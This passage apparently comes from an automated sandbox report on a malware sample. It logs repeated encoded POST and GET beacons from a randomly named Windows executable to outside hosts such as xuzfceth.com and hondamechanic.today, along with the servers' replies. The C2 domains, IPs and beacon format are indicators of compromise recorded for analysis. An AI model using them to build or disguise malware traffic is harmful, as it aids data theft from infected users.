                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            18192.168.2.649743152.32.156.214805680C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 18:53:52.141702890 CEST754OUTPOST /wvfe/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.xuzfceth.com
                                            Origin: http://www.xuzfceth.com
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 234
                                            Referer: http://www.xuzfceth.com/wvfe/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Raw: 5a 36 5a 54 47 3d 77 71 72 46 6f 79 73 46 55 31 68 45 32 69 70 54 70 73 4c 4a 70 33 2b 54 52 35 66 72 34 6a 66 69 32 62 5a 49 44 70 64 32 6e 68 55 42 58 4a 65 53 51 31 79 51 50 75 54 69 5a 58 77 63 38 55 49 75 36 63 45 59 41 47 58 4c 64 50 47 56 4c 53 4c 37 63 6b 7a 4e 74 31 49 79 57 79 61 68 6c 37 39 30 4e 70 44 34 72 79 4c 71 39 4d 55 63 51 78 55 52 41 6f 32 75 63 39 4b 72 45 5a 54 57 52 43 53 52 68 77 64 65 32 6d 56 2f 4f 54 58 54 65 78 79 6a 58 74 46 73 75 6b 54 49 72 65 49 6b 73 45 63 6c 53 49 41 32 6d 39 4b 75 4b 72 45 48 6d 44 41 2b 6a 37 67 2b 6a 59 4d 51 45 38 6e 6b 66 45 43 6a 42 6e 59 6d 71 71 2f 55 73 39 38 4f 4c 72 4a 37 4a 68 33 4e 6a 68 43 71 6b 58 52 4e 66 4b 45 38 52 41 3d 3d
                                            Data Ascii: Z6ZTG=wqrFoysFU1hE2ipTpsLJp3+TR5fr4jfi2bZIDpd2nhUBXJeSQ1yQPuTiZXwc8UIu6cEYAGXLdPGVLSL7ckzNt1IyWyahl790NpD4ryLq9MUcQxURAo2uc9KrEZTWRCSRhwde2mV/OTXTexyjXtFsukTIreIksEclSIA2m9KuKrEHmDA+j7g+jYMQE8nkfECjBnYmqq/Us98OLrJ7Jh3NjhCqkXRNfKE8RA==
                                            Jul 3, 2024 18:53:53.073028088 CEST295INHTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Wed, 03 Jul 2024 16:53:52 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: close
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            19192.168.2.649744152.32.156.214805680C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 18:53:54.682863951 CEST1767OUTPOST /wvfe/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.xuzfceth.com
                                            Origin: http://www.xuzfceth.com
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 1246
                                            Referer: http://www.xuzfceth.com/wvfe/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Raw: 5a 36 5a 54 47 3d 77 71 72 46 6f 79 73 46 55 31 68 45 32 69 70 54 70 73 4c 4a 70 33 2b 54 52 35 66 72 34 6a 66 69 32 62 5a 49 44 70 64 32 6e 68 4d 42 55 37 36 53 53 56 4f 51 4f 75 54 69 48 6e 77 64 38 55 49 4a 36 63 64 52 41 47 62 39 64 4b 43 56 49 77 76 37 62 56 7a 4e 36 46 49 79 4a 43 61 73 36 72 39 74 4e 70 7a 38 72 79 62 71 39 4d 55 63 51 79 4d 52 48 35 32 75 61 39 4b 6f 4d 35 54 61 47 79 53 39 68 77 46 67 32 6d 42 77 4f 69 72 54 65 52 69 6a 48 4c 35 73 78 55 54 4b 6f 65 49 38 73 45 68 6c 53 49 30 55 6d 2b 58 7a 4b 72 77 48 6b 57 39 67 7a 76 34 46 69 4b 55 69 63 2f 66 53 65 42 43 31 46 58 63 42 69 36 33 59 6a 63 49 39 45 37 56 50 64 78 4f 75 68 47 4b 4c 75 78 38 6f 66 4c 68 79 54 69 6c 62 53 46 69 4d 67 68 52 36 2b 6c 50 4d 61 4e 62 4f 57 75 6d 79 48 50 4d 4e 59 50 69 48 44 4c 64 35 62 6a 53 33 66 5a 52 61 66 38 6c 2b 61 65 4a 6c 69 32 53 33 30 35 66 51 44 48 64 49 62 52 50 7a 41 61 51 43 69 6a 55 79 6d 70 4e 65 39 66 7a 6e 4c 35 37 44 53 6c 58 41 56 6b 6a 49 38 31 38 34 35 68 2b 6f 38 72 77 55 [TRUNCATED]
                                            Data Ascii: Z6ZTG=wqrFoysFU1hE2ipTpsLJp3+TR5fr4jfi2bZIDpd2nhMBU76SSVOQOuTiHnwd8UIJ6cdRAGb9dKCVIwv7bVzN6FIyJCas6r9tNpz8rybq9MUcQyMRH52ua9KoM5TaGyS9hwFg2mBwOirTeRijHL5sxUTKoeI8sEhlSI0Um+XzKrwHkW9gzv4FiKUic/fSeBC1FXcBi63YjcI9E7VPdxOuhGKLux8ofLhyTilbSFiMghR6+lPMaNbOWumyHPMNYPiHDLd5bjS3fZRaf8l+aeJli2S305fQDHdIbRPzAaQCijUympNe9fznL57DSlXAVkjI81845h+o8rwUD0D7T/GBL0Q21Yp0XQUYDKqfI4irvn4CII1p8hrx8BnXZvYZ6BHyp/RKUG0Mmmme44tZfpPqilL3EcBwOVuX7yH22qkSGLLm3sM3pIkDIESnWB57d2bd+HESQjVfvBh1JsivWJ6D/nn4N0mR5uR3egMcBzCS+7+iTHXFZKw0/B2+qMCb22ZDTG1tIRfmwUle4jz/XKosB4a1X5yuHbhkJuzHpDtbg2493LnCCjm6yTOqBzc5fn48IGytRFBRmA9lVgQlJtKKMOX+vUGvM/C7T3tlFLLSFqcwl/N/sbS48IzCfK1yFWd/MWq3/vaK5PFtPw9YltcG+dckcYJFzmuEKisJSx8CZZNUqvo1y7gmQX8WMx9V4dwkcpkl5/JI6+1pKwn2JAn1hkyDPA0jQiMAyU3k5uHmV7+x8uUxOsfooDwj1owu/cLstNzkCztQDzIjlNlnAkC3mOZ2MlkWqJsn93FNLcIOGZK+OSUr8rMLZJwS0vbdUz39IkqbUUU58/dNo+E4k5r8/PN7qj2PqgfwDK0T/CiiQQXYgKhBW30fRvGNFNCmR10W98WSjmWdk6bf6Bbhj2tP6tOeFYiGVVIRTdvkLoiSJeWG7aHFh+7LdEhTTeyohLXvTLAr9KkjbJ6t/ArER8C2ikHFHLFHWVGL8N/KAiaXLijkFI [TRUNCATED]
                                            Jul 3, 2024 18:53:55.608947039 CEST295INHTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Wed, 03 Jul 2024 16:53:55 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: close
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            20192.168.2.649745152.32.156.214805680C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 18:53:57.213774920 CEST478OUTGET /wvfe/?3pSl=bXiTJHhxyN&Z6ZTG=9oDlrGBoczxc0gczmqK1qT+UWdDZ5zHLqosyG+84tRh7R4eQSXiPG8LnfVg9iGgF5+wWImCEQfufShLjWU3N10ZwNVybtIBwFMrSzRX1wq0uGk8UZr/5T8KnA73sbBy91RxM/wk= HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Host: www.xuzfceth.com
                                            Connection: close
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Jul 3, 2024 18:53:58.245620012 CEST1236INHTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Wed, 03 Jul 2024 16:53:58 GMT
                                            Content-Type: text/html
                                            Content-Length: 2495
                                            Last-Modified: Fri, 12 Jan 2024 02:44:44 GMT
                                            Connection: close
                                            Vary: Accept-Encoding
                                            ETag: "65a0a79c-9bf"
                                            Accept-Ranges: bytes
                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 6e 2d 68 65 61 64 3d 22 25 37 42 25 32 32 6c 61 6e 67 25 32 32 3a 25 37 42 25 32 32 31 25 32 32 3a 25 32 32 65 6e 25 32 32 25 37 44 25 37 44 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 4f 44 4f 52 20 49 4e 44 49 41 20 53 45 43 55 52 49 54 59 20 53 45 52 56 49 43 45 53 20 50 52 49 56 41 54 45 20 4c 49 4d 49 54 45 44 20 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 64 61 74 61 2d 6e 2d 68 65 61 64 3d 22 31 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 64 61 74 61 2d 6e 2d 68 65 61 64 3d 22 31 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 64 61 74 61 2d 6e 2d 68 65 61 64 3d 22 31 22 20 64 61 74 61 2d 68 69 64 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 [TRUNCATED]
                                            Data Ascii: <!doctype html><html lang="en" data-n-head="%7B%22lang%22:%7B%221%22:%22en%22%7D%7D"> <head> <title>HODOR INDIA SECURITY SERVICES PRIVATE LIMITED </title><meta data-n-head="1" charset="utf-8"><meta data-n-head="1" name="viewport" content="width=device-width,initial-scale=1"><meta data-n-head="1" data-hid="description" name="description" content=""><meta data-n-head="1" name="format-detection" content="telephone=no"><link data-n-head="1" rel="icon" type="image/x-icon" href="/favicon.ico"><link rel="preload" href="/_nuxt/e186113.js" as="script"><link rel="preload" href="/_nuxt/eff948d.js" as="script"><link rel="preload" href="/_nuxt/7b29598.js" as="script"> </head> <body> <div id="__nuxt"><style>#nuxt-loading{background:#fff;visibility:hidden;opacity:0;position:absolute;left:0;right:0;top:0;bottom:0;display:flex;justify-content:center;align-items:center;flex-direction:column;animation:nuxtLoadingIn 10s ease;-webkit-animation:nuxtLoadingIn 10s ease;animation-f
                                            Jul 3, 2024 18:53:58.245637894 CEST1236INData Raw: 69 6c 6c 2d 6d 6f 64 65 3a 66 6f 72 77 61 72 64 73 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 40 6b 65 79 66 72 61 6d 65 73 20 6e 75 78 74 4c 6f 61 64 69 6e 67 49 6e 7b 30 25 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 6f 70
                                            Data Ascii: ill-mode:forwards;overflow:hidden}@keyframes nuxtLoadingIn{0%{visibility:hidden;opacity:0}20%{visibility:visible;opacity:0}100%{visibility:visible;opacity:1}}@-webkit-keyframes nuxtLoadingIn{0%{visibility:hidden;opacity:0}20%{visibility:visibl
                                            Jul 3, 2024 18:53:58.245649099 CEST273INData Raw: 22 3e 3c 64 69 76 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 5f 5f 4e 55 58 54 5f 5f 3d 7b 63 6f 6e 66 69 67 3a 7b 5f 61 70 70 3a 7b 62 61 73 65 50 61 74 68
                                            Data Ascii: "><div>Loading...</div></div></div><script>window.__NUXT__={config:{_app:{basePath:"/",assetsPath:"/_nuxt/",cdnURL:null}}}</script> <script src="/_nuxt/e186113.js"></script><script src="/_nuxt/eff948d.js"></script><script src="/_nuxt/7b29598


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            21192.168.2.64974664.190.62.22805680C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 18:54:03.383797884 CEST751OUTPOST /expp/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.hondamechanic.today
                                            Origin: http://www.hondamechanic.today
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 210
                                            Referer: http://www.hondamechanic.today/expp/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Raw: 5a 36 5a 54 47 3d 31 54 6e 57 67 72 54 50 77 42 36 6b 62 57 77 6e 52 54 30 78 72 41 43 4b 69 31 74 48 4b 6a 34 57 68 50 56 6c 56 58 53 75 34 75 47 51 41 76 45 53 58 61 61 61 30 50 67 43 31 52 77 73 70 43 54 6f 55 58 43 53 5a 56 41 2b 75 68 2f 4f 6f 2b 6e 4e 48 59 6b 65 62 36 6f 38 69 74 69 4a 37 33 37 73 55 67 6b 35 56 4f 64 6a 47 39 78 2f 5a 6d 73 74 39 66 36 54 66 55 55 66 33 4c 6b 47 48 59 30 41 59 35 33 52 63 33 61 72 37 44 38 49 72 35 30 42 58 70 41 2b 71 50 66 77 2f 68 56 6b 54 7a 78 66 49 75 61 54 42 73 2b 4c 77 47 79 6a 61 55 2b 47 36 52 66 51 53 6f 34 34 6c 33 49 48 43 66 49 67 58 6c 62 37 37 58 7a 35 46 79 48 64
                                            Data Ascii: Z6ZTG=1TnWgrTPwB6kbWwnRT0xrACKi1tHKj4WhPVlVXSu4uGQAvESXaaa0PgC1RwspCToUXCSZVA+uh/Oo+nNHYkeb6o8itiJ737sUgk5VOdjG9x/Zmst9f6TfUUf3LkGHY0AY53Rc3ar7D8Ir50BXpA+qPfw/hVkTzxfIuaTBs+LwGyjaU+G6RfQSo44l3IHCfIgXlb77Xz5FyHd
                                            Jul 3, 2024 18:54:04.029783964 CEST305INHTTP/1.1 405 Not Allowed
                                            date: Wed, 03 Jul 2024 16:54:03 GMT
                                            content-type: text/html
                                            content-length: 154
                                            server: Parking/1.0
                                            connection: close
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            22192.168.2.64974764.190.62.22805680C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 18:54:05.923355103 CEST775OUTPOST /expp/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.hondamechanic.today
                                            Origin: http://www.hondamechanic.today
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 234
                                            Referer: http://www.hondamechanic.today/expp/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Raw: 5a 36 5a 54 47 3d 31 54 6e 57 67 72 54 50 77 42 36 6b 64 47 41 6e 42 41 73 78 2f 51 43 4a 74 56 74 48 54 7a 34 53 68 50 5a 6c 56 58 36 2b 34 39 75 51 42 4b 67 53 57 62 61 61 33 50 67 43 6e 78 77 74 33 79 53 6d 55 58 50 74 5a 56 4d 2b 75 67 62 4f 6f 37 62 4e 48 50 77 52 62 71 6f 79 75 4e 69 78 32 58 37 73 55 67 6b 35 56 50 73 47 47 39 70 2f 59 56 30 74 38 39 43 53 57 30 55 59 68 62 6b 47 44 59 30 63 59 35 33 7a 63 32 48 4d 37 42 55 49 72 39 77 42 57 34 41 35 39 66 66 79 67 78 55 34 44 51 49 70 4f 39 37 38 50 61 6d 58 7a 42 4f 6e 66 69 2f 63 6d 69 66 7a 41 34 59 36 6c 31 51 31 43 2f 49 4b 56 6c 6a 37 70 41 2f 65 4b 47 69 2b 4e 78 67 30 7a 2f 72 70 4a 68 74 6f 67 41 66 6e 59 30 6e 49 59 77 3d 3d
                                            Data Ascii: Z6ZTG=1TnWgrTPwB6kdGAnBAsx/QCJtVtHTz4ShPZlVX6+49uQBKgSWbaa3PgCnxwt3ySmUXPtZVM+ugbOo7bNHPwRbqoyuNix2X7sUgk5VPsGG9p/YV0t89CSW0UYhbkGDY0cY53zc2HM7BUIr9wBW4A59ffygxU4DQIpO978PamXzBOnfi/cmifzA4Y6l1Q1C/IKVlj7pA/eKGi+Nxg0z/rpJhtogAfnY0nIYw==
                                            Jul 3, 2024 18:54:06.585807085 CEST305INHTTP/1.1 405 Not Allowed
                                            date: Wed, 03 Jul 2024 16:54:06 GMT
                                            content-type: text/html
                                            content-length: 154
                                            server: Parking/1.0
                                            connection: close
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            23192.168.2.64974864.190.62.22805680C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 18:54:08.449192047 CEST1788OUTPOST /expp/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.hondamechanic.today
                                            Origin: http://www.hondamechanic.today
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 1246
                                            Referer: http://www.hondamechanic.today/expp/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Raw: 5a 36 5a 54 47 3d 31 54 6e 57 67 72 54 50 77 42 36 6b 64 47 41 6e 42 41 73 78 2f 51 43 4a 74 56 74 48 54 7a 34 53 68 50 5a 6c 56 58 36 2b 34 39 32 51 42 38 38 53 57 34 43 61 32 50 67 43 6b 78 77 6f 33 79 54 36 55 58 58 70 5a 55 77 75 75 69 54 4f 72 5a 6a 4e 54 71 4d 52 51 71 6f 79 6d 74 69 4b 37 33 37 35 55 67 31 77 56 50 63 47 47 39 70 2f 59 55 45 74 36 76 36 53 51 30 55 66 33 4c 6b 61 48 59 30 34 59 35 76 43 63 33 7a 32 37 52 30 49 72 64 67 42 55 4f 38 35 69 76 66 38 68 78 55 77 44 52 30 36 4f 39 6e 4b 50 61 36 78 7a 47 6d 6e 63 6e 61 2f 38 7a 62 30 63 6f 55 39 6b 48 31 52 4d 70 56 2b 4e 31 53 48 68 42 48 2f 46 58 65 65 4f 55 41 78 79 66 57 34 65 41 35 64 75 56 4f 6b 59 32 75 61 44 6d 75 47 56 4a 66 49 2b 76 4d 70 41 4c 43 54 63 67 6b 52 6c 34 61 4a 58 49 59 75 32 2f 6c 4b 66 70 32 4f 37 7a 75 69 71 70 35 41 64 4f 72 56 42 41 4c 49 44 36 6a 4c 71 61 58 4c 53 4e 72 66 33 42 58 50 2b 77 54 2b 4a 62 75 6c 78 65 32 62 61 79 34 64 47 38 66 68 76 68 79 4d 74 38 55 67 2b 46 2f 74 62 32 4b 75 32 52 34 67 [TRUNCATED]
                                            Data Ascii: Z6ZTG=1TnWgrTPwB6kdGAnBAsx/QCJtVtHTz4ShPZlVX6+492QB88SW4Ca2PgCkxwo3yT6UXXpZUwuuiTOrZjNTqMRQqoymtiK7375Ug1wVPcGG9p/YUEt6v6SQ0Uf3LkaHY04Y5vCc3z27R0IrdgBUO85ivf8hxUwDR06O9nKPa6xzGmncna/8zb0coU9kH1RMpV+N1SHhBH/FXeeOUAxyfW4eA5duVOkY2uaDmuGVJfI+vMpALCTcgkRl4aJXIYu2/lKfp2O7zuiqp5AdOrVBALID6jLqaXLSNrf3BXP+wT+Jbulxe2bay4dG8fhvhyMt8Ug+F/tb2Ku2R4gBCpYCyT9oB1aoLMoLJ0MkM/QKL04ER++NjfcJ1rwhUbn6IjOcJA+9PQVOQ3PMDGx4rXNxSsrcrYsqyAJFkKzyZWz3W8IB3eLe95uMEcvDg7oIZby8LkwXhCz/8oIZN7qsqTYNQnvxELCL2fQWRQWen9ohMGBQZDr57+gS96vL6IebsmNIA6dSmszoxTzC+XUtas/2CXxLrlmnacAqskJYFXSqUmTjcoD2j09HIBe1jrhQR1U2DJvm8e4HkWu5Z7t0vNW7OBvAqP89YvAjOUrxY9Sot5CjftAldvlZknJyCzQDR+NFyLOjk3/Qj9dCKltHBr7dOjFefh3VM24qo0Jo3xbeRpb5IcGfAh4LkjIiaSUEChf3cSXd7uHc6v/QqM/mw8LVNCAbP6sB4bbkCmcNjdeMjWN7fjc7n6cqF9jDcqs+//rfwKLaTlmjZlaRJb3mC7iyCmfqv1NiYtDjxGQ0cHgdVI0m//8Vg5+/1TCjhjUpW8aU2BssLG4M7USPc5DZvn17notTW3ktt6kZsyADlAsZyHta1WlOlvIQOUNibWXNiRLQJfSo0heiDezA9aZOS+VUAiztJ546ojwWoeZ5zsezWvC1ucUCOnf2KIdt1YaYj79waLpu+ZuoXyY8ltS7HjQnb44z/li8RVjnJuECIqtd1mjVUMtrP [TRUNCATED]
                                            Jul 3, 2024 18:54:09.202433109 CEST305INHTTP/1.1 405 Not Allowed
                                            date: Wed, 03 Jul 2024 16:54:08 GMT
                                            content-type: text/html
                                            content-length: 154
                                            server: Parking/1.0
                                            connection: close
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                                            Jul 3, 2024 18:54:09.427315950 CEST305INHTTP/1.1 405 Not Allowed
                                            date: Wed, 03 Jul 2024 16:54:08 GMT
                                            content-type: text/html
                                            content-length: 154
                                            server: Parking/1.0
                                            connection: close
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            24192.168.2.64974964.190.62.22805680C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            TimestampBytes transferredDirectionData
